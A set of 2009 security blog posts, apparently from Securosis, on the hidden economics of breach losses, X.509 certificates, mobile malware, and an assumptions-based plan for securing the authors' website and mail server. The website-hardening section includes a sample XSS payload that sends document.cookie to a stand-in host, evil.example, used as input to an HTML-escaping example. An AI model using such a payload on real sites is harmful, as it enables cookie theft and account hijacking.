When someone breaks into your house, you know it. When a retailer loses inventory to shrinkage, the losses are directly attributable to that part of the supply chain, and someone’s responsible. But our computer security losses aren’t so clear, and in fact are typically completely hidden from the asset owner. Banking losses due to hacking are spread throughout the system, with users rarely paying the price.
Actually, that statement is completely wrong. We all pay for this kind of fraud, but it’s hidden from us by being spread throughout the system, rather than tied to specific events. We all pay higher fees to cover these losses. Thus we don’t notice the pain, don’t cry out for change, and don’t change our practices. We don’t even pick our banks or credit cards based on security any more, since they all appear the same.
Losses are also anonymized on the corporate side. When an organization suffers a data breach, does the business unit involved suffer any losses? Do they pay for the remediation out of their departmental budget? Not in any company I’ve ever worked with – the losses are absorbed by IT/security.
Our system is constructed in a manner that completely disrupts the natural impact of market forces. Those most responsible for their assets suffer minimal or no direct pain when they experience losses. Damages are either spread through the system, or absorbed by another cost center.
Now imagine a world where we reverse this situation. Where consumers are responsible for the financial losses associated with illicit activity in their accounts. Where business unit managers have to pay for remediation efforts when they are hacked. I guarantee that behavior would quickly change.
The economics of security fail because the losses are invisibly transferred away from those with the most responsibility. They don’t suffer the pain of losses, but they do suffer the pain/inconvenience of security. On top of that, many of the losses are nearly impossible to measure, even if you detect them (non-regulated data loss). No wonder they don’t like us.
Security professionals ask me all the time when users will “get it”, and management will “pay attention”. We don’t have a hope of things changing until those in charge of the purse strings start suffering the pain associated with security failures.
It’s just simple economics.
Posted at Friday 13th November 2009 1:33 pm
(2) Comments •
I have to be honest. I’m getting tired of this whole “security is failing, security professionals suck” meme.
If the industry was failing that badly all our bank accounts would be empty, we’d be running on generators, our kids would all be institutionalized due to excessive exposure to porn, email would be dead, and all our Amazon orders would be rerouted to Liberia… but would never show up because of all the falling planes crashing into sinking cargo ships.
I’m not going to say we don’t have serious problems! We do, but we are also far from complete failure. Just as any retail supply chain struggles with shrinkage (theft), any organization of sufficient size will struggle with data shrinkage and security penetrations.
Are we suffering losses? Hell, yes. Are they bad? Most definitely. But these losses clearly haven’t hit the point where the pain to society has sufficiently exceeded our tolerance. Partially I think this is because the losses are unevenly distributed and hidden within the system, but that’s another post. I don’t know where the line is that will kick the world into action, but suspect it might involve sudden unavailability of Internet porn and LOLCats email.
Those of us deeply embedded within the security industry forget that the vast majority of people responsible for IT security across the world aren’t necessarily in dedicated positions within large enterprises. I’d venture a bet that if we add up all the 1-2 person security teams in SMB (many only doing security part-time), and other IT professionals with some security responsibilities, that number would be a pretty significant multiple of all the CISSPs and SANS graduates in the world.
It’s ridiculous for us to tell these folks that they are failing. They are slammed with day to day operational tasks, with no real possibility of ever catching up. I heard someone say at Gartner once that if we froze the technology world today, buying no new systems and approving no new projects, it would still take us 5 years to catch up.
Security professionals have evolved… they just have far too much to deal with on a daily basis. We also forget that, as with any profession, most of the people in it just want to do their jobs and go home at night, perhaps 10% are really good and always thinking about it, and at least 30% are lazy and suck. I might be too generous with that 30% number.
Security, and security professionals, aren’t failing. We lose some battles and win others, and life goes on. At some point the world feels enough pain and we get more resources to respond. Then we reduce that pain to an acceptable level, and we’re forgotten again.
That said, I do think life will be more interesting once losses aren’t hidden within the system (and I mean inside all kinds of businesses, not just the financial world). Once we can tie data loss to pain, perhaps priorities will shift. But that’s for another post…
On to the Summary:
Webcasts, Podcasts, Outside Writing, and Conferences
Favorite Securosis Posts
Other Securosis Posts
Favorite Outside Posts
Top News and Posts
Blog Comment of the Week
This week’s best comment comes from Mike Rothman in response to Compliance vs. Security:
Wow. Hard to know where to start here. There is a lot to like and appreciate about Corman’s positions. Security innovation has clearly suffered because organizations are feeding the compliance beast. Yes, there is some overlap - but it’s more being lucky than good when a compliance mandate actually improves security.
The reality is BOTH security and compliance do not add value to an organization. I’ve heard the “enabling” hogwash for years and still don’t believe it. That means organizations will spend the least amount possible to achieve a certain level of “risk” mitigation - whether it’s to address security threats or compliance mandates. That is not going to change.
What Josh is really doing is challenging all of us to break out of this death spiral, where we are beholden to the compliance gods and that means we cannot actually protect much of anything. Compliance is and will remain years behind the real threats.
Posted at Thursday 12th November 2009 9:52 pm
(1) Comments •
By Adrian Lane
A couple weeks ago, we began an internal discussion about DNS security and X.509 certificates. It dawned on me that those of you who have never worked with certificates may not understand what they are or what they are for. Sure, you can go to the X.509 Wiki, where you get the rules for usage and certificate structure, but that’s a little like trying to figure out football by reading the rule book. If you are asking, “What the heck is it and what is it used for?”, you are not alone.
An X.509 certificate is used to make an authoritative statement about something. A real life equivalent would be “Hi, I’m David, and I live at 555 Main Street.” The certificate holder presents it to someone/something in order to prove they are who they say they are, in order to establish trust. X.509 and other certificates are useful because the certificate provides the information needed both to validate the presenter’s claim and to authenticate the certificate itself. Like a driver’s license with a hologram, but much better. The recipient examines the certificate’s contents to decide whether the presenter is who they say they are, and then whether to trust them with some privilege.
Certificates are used primarily to establish trust on the web, and rely heavily on cryptography to provide the built-in validation. Certificates are always signed with a chain of authority. If the root of the chain is trusted, the user or application can extend that level of trust to some other domain/server/user. If the recipient doesn’t already trust the top signing authority, the certificate is ignored and no trust is established. In a way, an X.509 certificate is a basic embodiment of data centric security, as it contains both information and some rules of use.
Most certificates state within themselves what they are used for, and yes, they can be used for purposes other than validating web site identity/ownership, but in practice we don’t see diverse uses of X.509 certificates. You will hear that X.509 is an old format, and that it’s not particularly flexible or adaptable. All of which is true, and is why we don’t see it used very often in other contexts. Considering that X.509 certificates are used primarily for network security, but were designed a decade before most people had even heard of the Internet, they have worked considerably better than we had any right to expect.
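The chain-of-trust decision described above can be illustrated with a toy model. Real X.509 certificates use public-key signatures over ASN.1-encoded structures; the HMAC “signature” and dict “certificate” below are stand-ins chosen only to keep the sketch self-contained and runnable:

```python
import hashlib
import hmac

def sign(issuer_key: bytes, claim: str) -> str:
    # Stand-in for a real public-key signature over the certificate contents
    return hmac.new(issuer_key, claim.encode(), hashlib.sha256).hexdigest()

def make_cert(subject: str, issuer: str, issuer_key: bytes) -> dict:
    claim = f"{issuer} vouches that this identity belongs to {subject}"
    return {"subject": subject, "issuer": issuer,
            "claim": claim, "signature": sign(issuer_key, claim)}

def accept(cert: dict, issuer_keys: dict, trusted_roots: set) -> bool:
    """Trust is extended only if the signature validates AND the signer is trusted."""
    key = issuer_keys.get(cert["issuer"])
    if key is None or cert["issuer"] not in trusted_roots:
        return False  # unknown or untrusted signing authority: ignore the cert
    expected = sign(key, cert["claim"])
    return hmac.compare_digest(cert["signature"], expected)

root_key = b"root-ca-secret"
cert = make_cert("www.example.com", "RootCA", root_key)
print(accept(cert, {"RootCA": root_key}, {"RootCA"}))  # True
print(accept(cert, {"RootCA": root_key}, set()))       # False: root not trusted
```

Note how the second call fails even though the signature is valid: as the post says, if the recipient doesn’t already trust the signing authority, no trust is established.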
Posted at Thursday 12th November 2009 4:12 pm
(0) Comments •
I just read about some Georgia Tech researchers working on remote security techniques that carriers could use to help manage attacks on cell phones.
Years ago I used to focus on a similar issue: how mobile malware was something that carriers would eventually be responsible for stopping, and that’s why we wouldn’t really need AV on our phones. That particular prediction was clearly out of date before the threat ever reared its ugly head.
These days our phones are connected nearly as much to WiFi, Bluetooth, and other networks as they are to the carrier’s network. Thus it isn’t hard to see malware that checks to see which network interface is active before sending out any bad packets (DDoS is much more effective over WiFi than EDGE/3G anyway). This could circumvent the carrier, leaving malware to propagate over local networks.
Then again, perhaps we’ll all have super-high-speed carrier-based networks on some 6G technology before phone malware is prevalent, and we’ll be back on carrier networks again for most of our connectivity. In which case, if it’s AT&T, the network won’t be reliable enough for any malware to spread anyway.
Posted at Thursday 12th November 2009 3:43 pm
(0) Comments •
How often have you heard the phrase, “Never assume” (insert the cheesy catch phrase that was funny in 6th grade here)?
For the record, it’s wrong.
When designing our security, disaster recovery, or whatever, the problem isn’t that we make assumptions, it’s that we make the wrong assumptions. To narrow it down even more, the problem is when we make false assumptions, and typically those assumptions skew towards the positive, leaving us unprepared for the negative. Actually, I’ll narrow this down even more… the one assumption to avoid is a single phrase: “That will never happen.”
There’s really no way to perform any kind of forward-looking planning without some basis for assumptions. The trick to avoiding problems is that these assumptions should generally skew to the negative, and must always be justified, rather than merely accepted. It’s important not to make all your decisions based on worst cases, because that leads to excessive costs. Exposing all the assumptions helps you examine the corresponding risk tolerance.
For example, in mountain rescue we engaged in non-stop scenario planning, and had to make certain assumptions. We assumed that a well cared for rope under proper use would only break at its tested breaking strength (minus knots and other calculable factors). We didn’t assume said breaking strength was what was printed on the label by the manufacturer, but was our own internal breaking strength value, determined through testing. We would then build in a minimum of a 3:1 safety factor to account for unexpected dynamic strains/wear/whatever. In the field we were constantly calculating load levels in our heads, and would even occasionally break out a dynamometer to confirm. We also tested every single component in our rescue systems – including the litter we’d stick the patient into, just in case someone had to hang off the end of it.
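The load arithmetic works out like this. The breaking strength, knot derating, and safety factor below are illustrative numbers, not our team’s actual test values:

```python
def max_working_load(tested_breaking_strength: float,
                     knot_efficiency: float = 0.7,
                     safety_factor: float = 3.0) -> float:
    """Allowable load: internally tested breaking strength, derated for knots
    and other calculable factors, divided by the safety factor.
    All default figures here are illustrative, not real test data."""
    return tested_breaking_strength * knot_efficiency / safety_factor

# e.g. a rope that tested at 24 kN, derated 30% for knots, with a 3:1 safety factor
print(round(max_working_load(24.0), 2))  # 5.6 (kN allowable)
```

The teams using a 10:1 safety factor without their own testing would simply pass `safety_factor=10.0` and accept a much lower working load in exchange for skipping the test program.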
Our team was very heavy with engineers, but that isn’t the case with other rescue teams. Most of them used a 10:1 safety factor, but didn’t perform the same kinds of testing or calculations we did. There’s nothing wrong with that… although it did give our team a little more flexibility.
I was recently explaining the assumptions I used to derive our internal corporate security, and realized that I’ve been using a structured assumptions framework that I haven’t ever put in writing (until now). Since all scenario planning is based on assumptions, and the trick is to pick the right assumptions, I formalized my approach in the shower the other night (an image that has likely scarred all of you for life). It consists of four components:
- Assumption: The statement itself – what we believe to be true.
- Reasoning: The basis for the assumption.
- Indicators: Specific cues that indicate whether the assumption is accurate or if there’s a problem in that area.
- Controls: The security/recovery/safety controls to mitigate the issue.
Here’s how I put it in practice when developing our security:
Assumption: Securosis in general, and myself specifically, are a visible target.
Reasoning: We are extremely visible and vocal in the security community, and as such are more than just a target of opportunity. We also have strong relationships within the vulnerability research community, where directed attacks to embarrass individuals are not uncommon. That said, we aren’t at the top of an attacker’s list – there is no financial incentive to attack us, nor does any of our work directly interfere with the income of cybercriminal organizations. While we deal with some non-public information, it isn’t particularly valuable in a financial context. Thus we are a target, but the motivation would be to embarrass us and disrupt our operations, not to generate income.
Indicators: A number of our industry friends have been targeted and successfully attacked. Last year one of my private conversations with one such victim was revealed as part of an attack. For this particular assumption, no further indicators are really needed.
Controls: This assumption doesn’t drive specific controls, but does reinforce a general need to invest heavily in security to protect against a directed attack by someone willing to take the time to compromise myself or the company. You’ll see how this impacts things with the other assumptions.
Assumption: While we are a target, we are not valuable enough to waste a serious zero-day exploit on.
Reasoning: A zero-day capable of compromising our infrastructure will be too financially valuable to waste on merely embarrassing a gaggle of analysts. This is true for our internal infrastructure, but not necessarily for our web site.
Indicators: If this assumption is wrong, it’s possible one of our outbound filtering layers will register unusual activity, or we will see odd activity from a server.
Controls: Outbound filtering is our top control here, and we’ve minimized our external surface area and compartmentalized things internally. The zero-day would probably have to target our individual desktops, or our mail server, since we don’t really have much else. Our web site is on a less common platform, and I’ll talk more about that in a second. There are other possible controls we could put in place (from DLP to HIPS), but unless we have an indication someone would burn a valuable exploit on us, they aren’t worth the cost.
Assumption: Our website will be hacked.
Reasoning: We do not have the resources to perform full code analysis and lockdown on the third party platform we built our site on. Our site is remotely co-hosted, which also opens up potential points of attack. It is the weakest link in our infrastructure, and the easiest point to attack short of developing some new zero-day against our mail server or desktops.
Indicators: Unusual activity within the site, or new administrative user accounts. We periodically review the back-end management infrastructure for indicators of an ongoing compromise, including both the file system and the content management system. For example, if HTML rendering in comments was suddenly turned on, that would be an indicator.
Controls: We deliberately chose a service provider and platform with better than average security records, and security controls not usually available for a co-hosted site. We’ve disabled any HTML rendering in comments/forum posts, and promote use of NoScript when visiting our site to reduce user exposure when it’s compromised. On our side, we mandate single-site passwords for all the staff, which are not reused anywhere else. The site is hosted separately from our other infrastructure. I encourage everyone to use a single site browser that is locked down to only render content from our site (to avoid XSS/CSRF). I use two different layers to ensure I can only access the site, and nothing but the site, from my dedicated browser. Thus our own site shouldn’t be able to be used to compromise any other part of our infrastructure when someone finally pops it. Also, right now we don’t store sensitive information about any visitors on the site (no PII). When we do start offering for-pay products, we will use external credit card processing, pay for ongoing penetration testing, and remind our users to never reuse their site password anyplace else. We have a multi-level backup scheme to minimize lost data when the site is finally hacked.
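The “no HTML rendering in comments” control above amounts to escaping user-supplied text before display, so markup arrives as inert characters. A minimal sketch (the hostile payload is a hypothetical example):

```python
import html

def render_comment(comment: str) -> str:
    """Escape user-supplied comment text so the browser treats it as plain
    text rather than markup (defeats injected <script> tags and the like)."""
    return html.escape(comment, quote=True)

hostile = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'
print(render_comment(hostile))
# The angle brackets and quotes come out as &lt; &gt; &quot; entities,
# so nothing executes in the visitor's browser.
```

Escaping on output like this is a blunt instrument compared to an HTML sanitizer, but for a site that has no legitimate need for markup in comments, it removes the whole class of XSS-via-comment attacks.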
Assumption: Our mail server is the most valuable target for an attacker.
Reasoning: Assuming our attacker is out to steal proprietary information or just embarrass us, our mail server is the best target (except for maybe my personal desktop). That’s where our sensitive client information is, and we pretty much give everything else away for free.
Indicators: Either a rise in attack activity on our mail server, or new outbound connections/accounts.
Controls: We have multiple layers of security on the mail server. It’s on an isolated network with nothing else on that network segment to compromise. This is the one area I don’t want to discuss in detail, but we have at least two filtering layers to get to the server (more than just a firewall), and outbound connection restrictions with a serious deny-all policy. Our mail server is locked up in my house (no remote admins, no other sites on the server that could be compromised to get to us), but not connected to my home network. The server itself is locked down pretty tight – we don’t even allow AV/anti-spam on the server since that could be a vector for attack (in other words, we minimize message processing). There’s even more, but despite what they say a little obscurity is sometimes good for security. If someone can get this server, they’ve fracking earned it.
This is already longer than I planned, but you can see the process. I’ve done the same thing for my day to day system and laptop, with a set of corresponding controls. Despite all this I’ll probably be hacked someday, but it will take a hack of a lot of time and effort since I always assume I’m under attack, and take precautions far above normal best practices. My goal is to make the effort to get to me high enough that to succeed, someone will have to give up far more lucrative financial opportunities. Even bad guys need to feed their families.
Assumptions are good… as long as you understand the reasoning, define indicators to track if they are right or wrong over time, and use them to develop corresponding controls.
Posted at Thursday 12th November 2009 9:17 am
(6) Comments •